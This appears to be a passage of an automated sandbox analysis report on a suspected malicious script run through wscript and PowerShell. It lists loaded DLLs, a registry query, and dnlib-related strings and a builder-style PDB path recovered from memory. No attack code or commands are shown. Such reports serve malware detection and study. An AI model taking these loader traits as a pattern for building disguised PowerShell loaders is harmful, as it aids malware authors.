        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdbX source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000004.00000002.2214644675.000001C26A778000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.2221743469.000001C26C9C9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2223028168.000001C26CCC0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2198404979.000001C21006E000.00000004.00000800.00020000.00000000.sdmp
